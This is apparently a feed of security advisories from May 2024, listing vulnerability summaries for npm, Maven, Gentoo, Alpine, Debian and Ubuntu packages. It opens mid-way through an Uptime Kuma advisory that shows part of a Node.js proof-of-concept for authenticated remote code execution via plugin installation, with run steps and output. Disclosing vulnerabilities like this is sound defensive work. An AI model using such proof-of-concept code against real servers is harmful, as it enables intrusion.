(res) => { if (res.ok !== true) return console.log("Login failed"); console.log("Login successful"); socket.emit("installPlugin", repo, name, () => { console.log("Done"); socket.close(); }); });```5. Install `socket.io-client`: `npm install socket.io-client`6. Run the script: `node poc.js`:```# node poc.jsLogin successfulDone```7. The PoC file has been created:```➜ ~ docker exec -it uptime-kuma cat /tmp/pocMalicious code could have been executed as user root```### ImpactThis vulnerability allows authenticated attacker to gain remote code execution on the server Uptime Kuma is running on.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-7GRX-F945-MJ96
01.05.2024 13:01:03	npm	[NPM:GHSA-VR8X-74PM-6VJ7] Uptime Kuma's authenticated path traversal via plugin repository name may lead to unavailability or data loss (moderate)	### SummaryA path traversal vulnerability via the plugin repository name allows an authenticated attacker to delete files on the server leading to unavailability and potentially data loss.### DetailsUptime Kuma allows authenticated users to install plugins from an official list of plugins. This feature is currently disabled in the web interface, but the corresponding API endpoints are still available after login.Before a plugin is downloaded, the plugin installation directory is checked for existence. If it exists, it's removed before the plugin installation.Because the plugin is not validated against the official list of plugins or sanitized, the check for existence and the removal of the plugin installation directory are prone to path traversal.### ImpactThis vulnerability allows an authenticated attacker to delete files from the server Uptime Kuma is running on.Depending on which files are deleted, Uptime Kuma or the whole system may become unavailable due to data loss.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-VR8X-74PM-6VJ7
01.05.2024 03:00:00	cisa	[CISA-2024:0501] CISA Adds One Known Exploited Vulnerability to Catalog (high)	CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0501
01.05.2024 11:25:04	npm	[NPM:GHSA-GHR5-CH3P-VCR6] ejs lacks certain pollution protection (moderate)	The ejs (aka Embedded JavaScript templates) package before 3.1.10 for Node.js lacks certain pollution protection.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-GHR5-CH3P-VCR6
05.05.2024 03:00:00	gentoo	[GLSA-202405-10] Setuptools: Denial of Service (normal)	A vulnerability has been discovered in Setuptools, which can lead to denial of service.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-10
05.05.2024 03:00:00	gentoo	[GLSA-202405-12] Pillow: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in Pillow, the worst of which can lead to arbitrary code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-12
05.05.2024 03:00:00	gentoo	[GLSA-202405-11] MIT krb5: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been discovered in MIT krb5, the worst of which could lead to remote code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-11
05.05.2024 03:00:00	gentoo	[GLSA-202405-13] borgmatic: Shell Injection (high)	A vulnerability has been discovered in borgmatic, which can lead to shell injection.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-13
05.05.2024 03:00:00	gentoo	[GLSA-202405-14] QtWebEngine: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in QtWebEngine, the worst of which could lead to remote code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-14
05.05.2024 03:00:00	gentoo	[GLSA-202405-15] Mozilla Firefox: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in Mozilla Firefox, the worst of which can lead to remote code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-15
05.05.2024 03:00:00	gentoo	[GLSA-202405-16] Apache Commons BCEL: Remote Code Execution (normal)	A vulnerability has been discovered in Apache Commons BCEL, which can lead to remote code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-16
04.05.2024 03:00:00	gentoo	[GLSA-202405-04] systemd: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been discovered in systemd, the worst of which can lead to a denial of service.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-04
04.05.2024 03:00:00	gentoo	[GLSA-202405-05] MPlayer: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been discovered in MPlayer, the worst of which can lead to arbitrary code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-05
04.05.2024 03:00:00	gentoo	[GLSA-202405-06] mujs: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been discovered in mujs, the worst of which could lead to remote code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-06
04.05.2024 03:00:00	gentoo	[GLSA-202405-07] HTMLDOC: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been discovered in HTMLDOC, the worst of which can lead to arbitrary code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-07
04.05.2024 03:00:00	gentoo	[GLSA-202405-08] strongSwan: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been discovered in strongSwan, the worst of which could possibly lead to remote code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-08
04.05.2024 03:00:00	gentoo	[GLSA-202405-01] Python, PyPy3: Multiple Vulnerabilities (high)	Multiple vulberabilities have been discovered in Python and PyPy3, the worst of which can lead to privilege escalation.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-01
04.05.2024 03:00:00	gentoo	[GLSA-202405-02] ImageMagick: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-02
04.05.2024 03:00:00	gentoo	[GLSA-202405-03] Dalli: Code Injection (normal)	A vulnerability has been discovered in Dalli, which can lead to code injection.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-03
04.05.2024 03:00:00	gentoo	[GLSA-202405-09] MediaInfo, MediaInfoLib: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been found in MediaInfo and MediaInfoLib, the worst of which could allow user-assisted remote code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-09
03.05.2024 23:30:39	npm	[NPM:GHSA-HFRV-H3Q8-9JPR] kurwov vulnerable to Denial of Service due to improper data sanitization (moderate)	### SummaryAn unsafe sanitization of dataset contents on the `MarkovData#getNext` method used in `Markov#generate` and `Markov#choose` allows a maliciously crafted string on the dataset to throw and stop the function from running properly.### Detailshttps://github.com/xiboon/kurwov/blob/0d58dfa42135ab40e830e92622857282f980ca89/src/MarkovData.ts#L38-L44If a string contains a forbidden substring (i.e. `__proto__`) followed by a space character, the second line will access a special property in `MarkovData#finalData` by removing the last character of the string, bypassing the dataset sanitization (as it is supposed to be already sanitized before this function is called).`data` is then defined as the special function found in its prototype instead of an array.On the last line, `data` is then indexed by a random number, which is supposed to return a string but returns undefined as it's a function. Calling `endsWith` then throws.### PoChttps://runkit.com/embed/m6uu40r5ja9b### ImpactAny dataset can be contaminated with the substring making it unable to properly generate anything in some cases.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-HFRV-H3Q8-9JPR
03.05.2024 23:34:33	maven	[MAVEN:GHSA-4H8F-2WVX-GG5W] Bouncy Castle Java Cryptography API vulnerable to DNS poisoning (low)	An issue was discovered in Bouncy Castle Java Cryptography APIs before BC 1.78. When endpoint identification is enabled in the BCJSSE and an SSL socket is created without an explicit hostname (as happens with HttpsURLConnection), hostname verification could be performed against a DNS-resolved IP address in some situations, opening up a possibility of DNS poisoning.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-4H8F-2WVX-GG5W
03.05.2024 23:38:16	npm	[NPM:GHSA-M5JF-8CRM-R65M] Vditor allows Cross-site Scripting via an attribute of an `A` element (moderate)	Vditor 3.10.3 allows XSS via an attribute of an `A` element.NOTE: the vendor indicates that a user is supposed to mitigate this via `sanitize=true`.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-M5JF-8CRM-R65M
03.05.2024 13:15:08	alpinelinux	[ALPINE:CVE-2024-34062] py3-tqdm vulnerability (medium)	[From CVE-2024-34062] tqdm is an open source progress bar for Python and CLI. Any optional non-boolean CLI arguments (e.g. `--delim`, `--buf-size`, `--manpath`) are passed through python's `eval`, allowing arbitrary code execution. This issue is only locally exploitable and had been addressed in release version 4.66.3. All users are advised to upgrade. There are no known workarounds for this vulnerability.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-34062
03.05.2024 10:54:25	suse	[SUSE-SU-2024:1490-1] Security update for the Linux Kernel (important)	Security update for the Linux Kernel	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1490-1
03.05.2024 06:16:00	alpinelinux	[ALPINE:CVE-2023-44444] gimp vulnerability (high)	[From CVE-2023-44444] GIMP PSP File Parsing Off-By-One Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of PSP files. Crafted data in a PSP file can trigger an off-by-one error when calculating a location to write within a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-22097.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-44444
03.05.2024 06:16:00	alpinelinux	[ALPINE:CVE-2023-44443] gimp vulnerability (high)	[From CVE-2023-44443] GIMP PSP File Parsing Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of PSP files. The issue results from the lack of proper validation of user-supplied data, which can result in an integer overflow before writing to memory. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-22096.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-44443
03.05.2024 06:16:00	alpinelinux	[ALPINE:CVE-2023-44446] gst-plugins-bad vulnerability (high)	[From CVE-2023-44446] GStreamer MXF File Parsing Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GStreamer. Interaction with this library is required to exploit this vulnerability but attack vectors may vary depending on the implementation.The specific flaw exists within the parsing of MXF video files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-22299.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-44446
03.05.2024 06:15:59	alpinelinux	[ALPINE:CVE-2023-44441] gimp vulnerability (high)	[From CVE-2023-44441] GIMP DDS File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of DDS files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-22093.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-44441
03.05.2024 06:15:59	alpinelinux	[ALPINE:CVE-2023-44442] gimp vulnerability (high)	[From CVE-2023-44442] GIMP PSD File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of PSD files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute arbitrary code in the context of the current process. Was ZDI-CAN-22094.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-44442
03.05.2024 06:15:57	alpinelinux	[ALPINE:CVE-2023-44429] gst-plugins-bad vulnerability (high)	[From CVE-2023-44429] GStreamer AV1 Codec Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GStreamer. Interaction with this library is required to exploit this vulnerability but attack vectors may vary depending on the implementation.The specific flaw exists within the parsing of AV1 encoded video files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-22226.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-44429
03.05.2024 06:15:50	alpinelinux	[ALPINE:CVE-2023-42115] exim vulnerability (critical)	[From CVE-2023-42115] Exim AUTH Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Exim. Authentication is not required to exploit this vulnerability. The specific flaw exists within the smtp service, which listens on TCP port 25 by default. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of a buffer. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-17434.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-42115
03.05.2024 06:15:50	alpinelinux	[ALPINE:CVE-2023-42116] exim vulnerability (high)	[From CVE-2023-42116] Exim SMTP Challenge Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Exim. Authentication is not required to exploit this vulnerability.The specific flaw exists within the handling of NTLM challenge requests. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-17515.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-42116
03.05.2024 06:15:50	alpinelinux	[ALPINE:CVE-2023-42117] exim vulnerability (high)	[From CVE-2023-42117] Exim Improper Neutralization of Special Elements Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Exim. Authentication is not required to exploit this vulnerability.The specific flaw exists within the smtp service, which listens on TCP port 25 by default. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-17554.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-42117
03.05.2024 06:15:50	alpinelinux	[ALPINE:CVE-2023-42118] libspf2 vulnerability (high)	[From CVE-2023-42118] Exim libspf2 Integer Underflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Exim libspf2. Authentication is not required to exploit this vulnerability. The specific flaw exists within the parsing of SPF macros. When parsing SPF macros, the process does not properly validate user-supplied data, which can result in an integer underflow before writing to memory. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-17578.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-42118
03.05.2024 06:15:50	alpinelinux	[ALPINE:CVE-2023-42119] exim vulnerability (low)	[From CVE-2023-42119] Exim dnsdb Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of Exim. Authentication is not required to exploit this vulnerability.The specific flaw exists within the smtp service, which listens on TCP port 25 by default. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the service account. Was ZDI-CAN-17643.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-42119
03.05.2024 06:15:49	alpinelinux	[ALPINE:CVE-2023-42114] exim vulnerability (low)	[From CVE-2023-42114] Exim NTLM Challenge Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Exim. Authentication is not required to exploit this vulnerability.The specific flaw exists within the handling of NTLM challenge requests. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated data structure. An attacker can leverage this vulnerability to disclose information in the context of the service account. Was ZDI-CAN-17433.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-42114
03.05.2024 06:15:20	alpinelinux	[ALPINE:CVE-2023-40475] gst-plugins-bad vulnerability (high)	[From CVE-2023-40475] GStreamer MXF File Parsing Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GStreamer. Interaction with this library is required to exploit this vulnerability but attack vectors may vary depending on the implementation.The specific flaw exists within the parsing of MXF video files. The issue results from the lack of proper validation of user-supplied data, which can result in an integer overflow before allocating a buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-21661.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-40475
03.05.2024 06:15:20	alpinelinux	[ALPINE:CVE-2023-40476] gst-plugins-bad vulnerability (high)	[From CVE-2023-40476] GStreamer H265 Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GStreamer. Interaction with this library is required to exploit this vulnerability but attack vectors may vary depending on the implementation.The specific flaw exists within the parsing of H265 encoded video files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-21768.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-40476
03.05.2024 06:15:19	alpinelinux	[ALPINE:CVE-2023-40474] gst-plugins-bad vulnerability (high)	[From CVE-2023-40474] GStreamer MXF File Parsing Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GStreamer. Interaction with this library is required to exploit this vulnerability but attack vectors may vary depending on the implementation.The specific flaw exists within the parsing of MXF video files. The issue results from the lack of proper validation of user-supplied data, which can result in an integer overflow before allocating a buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-21660.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-40474
03.05.2024 05:15:53	alpinelinux	[ALPINE:CVE-2023-38103] gst-plugins-ugly vulnerability (high)	[From CVE-2023-38103] GStreamer RealMedia File Parsing Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GStreamer. Interaction with this library is required to exploit this vulnerability but attack vectors may vary depending on the implementation.The specific flaw exists within the parsing of MDPR chunks. The issue results from the lack of proper validation of user-supplied data, which can result in an integer overflow before allocating a buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-21443.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-38103
03.05.2024 05:15:53	alpinelinux	[ALPINE:CVE-2023-38104] gst-plugins-ugly vulnerability (high)	[From CVE-2023-38104] GStreamer RealMedia File Parsing Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GStreamer. Interaction with this library is required to exploit this vulnerability but attack vectors may vary depending on the implementation.The specific flaw exists within the parsing of MDPR chunks. The issue results from the lack of proper validation of user-supplied data, which can result in an integer overflow before allocating a buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-21444.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-38104
03.05.2024 05:15:43	alpinelinux	[ALPINE:CVE-2023-37327] gst-plugins-good vulnerability (high)	[From CVE-2023-37327] GStreamer FLAC File Parsing Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GStreamer. Interaction with this library is required to exploit this vulnerability but attack vectors may vary depending on the implementation.The specific flaw exists within the parsing of FLAC audio files. The issue results from the lack of proper validation of user-supplied data, which can result in an integer overflow before allocating a buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-20775.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-37327
03.05.2024 05:15:43	alpinelinux	[ALPINE:CVE-2023-37328] gst-plugins-bad vulnerability (high)	[From CVE-2023-37328] GStreamer PGS File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GStreamer. Interaction with this library is required to exploit this vulnerability but attack vectors may vary depending on the implementation.The specific flaw exists within the parsing of PGS subtitle files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-20994.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-37328
03.05.2024 05:15:43	alpinelinux	[ALPINE:CVE-2023-37329] gst-plugins-bad vulnerability (high)	[From CVE-2023-37329] GStreamer SRT File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GStreamer. Interaction with this library is required to exploit this vulnerability but attack vectors may vary depending on the implementation.The specific flaw exists within the parsing of SRT subtitle files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-20968.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-37329
03.05.2024 03:00:00	debian	[DSA-5678-1] glibc	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5678-1
03.05.2024 03:00:00	debian	[DSA-5679-1] less	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5679-1
03.05.2024 03:00:00	debian	[DSA-5677-1] ruby3.1	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5677-1
03.05.2024 23:24:30	npm	[NPM:GHSA-6433-X5P4-8JC7] libxmljs vulnerable to type confusion when parsing specially crafted XML (high)	libxmljs is vulnerable to a type confusion vulnerability when parsing a specially crafted XML while invoking a function on the result of `attrs()` that was called on a parsed node. This vulnerability might lead to denial of service (on both 32-bit systems and 64-bit systems), data leak, infinite loop and remote code execution (on 32-bit systems with the XML_PARSE_HUGE flag enabled).	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-6433-X5P4-8JC7
03.05.2024 23:24:18	npm	[NPM:GHSA-78H3-PG4X-J8CV] libxmljs vulnerable to type confusion when parsing specially crafted XML (high)	libxmljs2 is vulnerable to a type confusion vulnerability when parsing a specially crafted XML while invoking the `namespaces()` function (which invokes `XmlNode::get_local_namespaces()`) on a grand-child of a node that refers to an entity. This vulnerability can lead to denial of service and remote code execution.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-78H3-PG4X-J8CV
03.05.2024 23:24:05	npm	[NPM:GHSA-MG49-JQGW-GCJ6] libxmljs vulnerable to type confusion when parsing specially crafted XML (high)	libxmljs is vulnerable to a type confusion vulnerability when parsing a specially crafted XML while invoking the `namespaces()` function (which invokes `_wrap__xmlNode_nsDef_get()`) on a grand-child of a node that refers to an entity. This vulnerability can lead to denial of service and remote code execution.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-MG49-JQGW-GCJ6
03.05.2024 20:33:01	npm	[NPM:GHSA-MJR4-7XG5-PFVH] libxmljs2 type confusion vulnerability when parsing specially crafted XML (high)	libxmljs2 is vulnerable to type confusion when parsing a specially crafted XML while invoking a function on the result of attrs() that was called on a parsed node. This vulnerability might lead to denial of service (on both 32-bit systems and 64-bit systems), data leak, infinite loop and remote code execution (on 32-bit systems with the XML_PARSE_HUGE flag enabled). At the time of publication, there is no fix.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-MJR4-7XG5-PFVH
02.05.2024 23:15:07	alpinelinux	[ALPINE:CVE-2024-4140] perl-email-mime vulnerability (high)	[From CVE-2024-4140] An excessive memory use issue (CWE-770) exists in Email-MIME, before version 1.954, which can cause denial of service when parsing multipart MIME messages. The patch set (from 2020 and 2024) limits excessive depth and the total number of parts.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-4140
02.05.2024 18:57:55	ubuntu	[USN-6757-2] PHP vulnerabilities (medium)	Several security issues were fixed in PHP.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6757-2
03.05.2024 23:12:01	maven	[MAVEN:GHSA-X7G6-RWHC-G7MJ] Wildfly vulnerable to denial of service (moderate)	A vulnerability was found in Wildfly’s management interface. Due to the lack of limitation of sockets for the management interface, it may be possible to cause a denial of service hitting the nofile limit as there is no possibility to configure or set a maximum number of connections.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-X7G6-RWHC-G7MJ
03.05.2024 22:37:36	maven	[MAVEN:GHSA-PHH3-2P9M-W6J5] Jenkins Subversion Partial Release Manager Plugin programmatically disables the fix for CVE-2016-3721 (moderate)	Jenkins Subversion Partial Release Manager Plugin 1.0.1 and earlier programmatically sets the Java system property `hudson.model.ParametersAction.keepUndefinedParameters` whenever a build is triggered from a release tag with the 'Svn-Partial Release Manager' SCM. Doing so disables the fix for [SECURITY-170](https://www.jenkins.io/security/advisory/2016-05-11/#arbitrary-build-parameters-are-passed-to-build-scripts-as-environment-variables) / CVE-2016-3721.As of publication of this advisory, there is no fix.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-PHH3-2P9M-W6J5
03.05.2024 22:35:09	maven	[MAVEN:GHSA-94PR-W968-H923] Jenkins Telegram Bot Plugin stores the Telegram Bot token in plaintext (low)	Jenkins Telegram Bot Plugin 1.4.0 and earlier stores the Telegram Bot token unencrypted in its global configuration file `jenkinsci.plugins.telegrambot.TelegramBotGlobalConfiguration.xml` on the Jenkins controller as part of its configuration.This token can be viewed by users with access to the Jenkins controller file system.As of publication of this advisory, there is no fix.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-94PR-W968-H923
03.05.2024 23:17:37	maven	[MAVEN:GHSA-2G4Q-9VM9-9FW4] Jenkins Script Security Plugin sandbox bypass vulnerability (moderate)	Jenkins Script Security Plugin provides a sandbox feature that allows low privileged users to define scripts, including Pipelines, that are generally safe to execute. Calls to code defined inside a sandboxed script are intercepted, and various allowlists are checked to determine whether the call is to be allowed.Multiple sandbox bypass vulnerabilities exist in Script Security Plugin 1335.vf07d9ce377a_e and earlier:- Crafted constructor bodies that invoke other constructors can be used to construct any subclassable type via implicit casts.- Sandbox-defined Groovy classes that shadow specific non-sandbox-defined classes can be used to construct any subclassable type.These vulnerabilities allow attackers with permission to define and run sandboxed scripts, including Pipelines, to bypass the sandbox protection and execute arbitrary code in the context of the Jenkins controller JVM.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-2G4Q-9VM9-9FW4
03.05.2024 23:14:30	maven	[MAVEN:GHSA-V63G-V339-2673] Jenkins Script Security Plugin has sandbox bypass vulnerability involving crafted constructor bodies (high)	Jenkins Script Security Plugin provides a sandbox feature that allows low privileged users to define scripts, including Pipelines, that are generally safe to execute. Calls to code defined inside a sandboxed script are intercepted, and various allowlists are checked to determine whether the call is to be allowed.Multiple sandbox bypass vulnerabilities exist in Script Security Plugin 1335.vf07d9ce377a_e and earlier:- Crafted constructor bodies that invoke other constructors can be used to construct any subclassable type via implicit casts.- Sandbox-defined Groovy classes that shadow specific non-sandbox-defined classes can be used to construct any subclassable type.These vulnerabilities allow attackers with permission to define and run sandboxed scripts, including Pipelines, to bypass the sandbox protection and execute arbitrary code in the context of the Jenkins controller JVM.- These issues are caused by an incomplete fix of [SECURITY-2824](https://www.jenkins.io/security/advisory/2022-10-19/#SECURITY-2824%20(1)).Script Security Plugin 1336.vf33a_a_9863911 has additional restrictions and sanity checks to ensure that super constructors cannot be constructed without being intercepted by the sandbox:- Calls to to other constructors using this are now intercepted by the sandbox.- Classes in packages that can be shadowed by Groovy-defined classes are no longer ignored by the sandbox when intercepting super constructor calls.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-V63G-V339-2673
03.05.2024 23:01:45	npm	[NPM:GHSA-RCM2-22F3-PQV3] Firebase vulnerable to CRSF attack (low)	This vulnerability was a potential CSRF attack. When running the Firebase emulator suite, there is an export endpoint that is used normally to export data from running emulators. If a user was running the emulator and navigated to a malicious website with the exploit on a browser that allowed calls to localhost (ie Chrome before v94), the website could exfiltrate emulator data. We recommend upgrading past version 13.6.0 or [commit 068a2b08dc308c7ab4b569617f5fc8821237e3a0](https://github.com/firebase/firebase-tools/commit/068a2b08dc308c7ab4b569617f5fc8821237e3a0).	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-RCM2-22F3-PQV3
02.05.2024 15:45:48	ubuntu	[USN-6762-1] GNU C Library vulnerabilities (critical)	Several security issues were fixed in GNU C Library.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6762-1
03.05.2024 20:47:08	maven	[MAVEN:GHSA-GJ5M-M88J-V7C3] Apache ActiveMQ's default configuration doesn't secure the API web context (high)	In Apache ActiveMQ 6.x, the default configuration doesn't secure the API web context (where the Jolokia JMX REST API and the Message REST API are located). It means that anyone can use these layers without any required authentication. Potentially, anyone can interact with the broker (using Jolokia JMX REST API) and/or produce/consume messages or purge/delete destinations (using the Message REST API).To mitigate, users can update the default conf/jetty.xml configuration file to add authentication requirement:<bean id="securityConstraintMapping" class="org.eclipse.jetty.security.ConstraintMapping"> <property name="constraint" ref="securityConstraint" /> <property name="pathSpec" value="/" /></bean>Or we encourage users to upgrade to Apache ActiveMQ 6.1.2 where the default configuration has been updated with authentication by default.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-GJ5M-M88J-V7C3
02.05.2024 06:20:32	ubuntu	[USN-6747-2] Firefox regressions	USN-6747-1 caused some minor regressions in Firefox.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6747-2
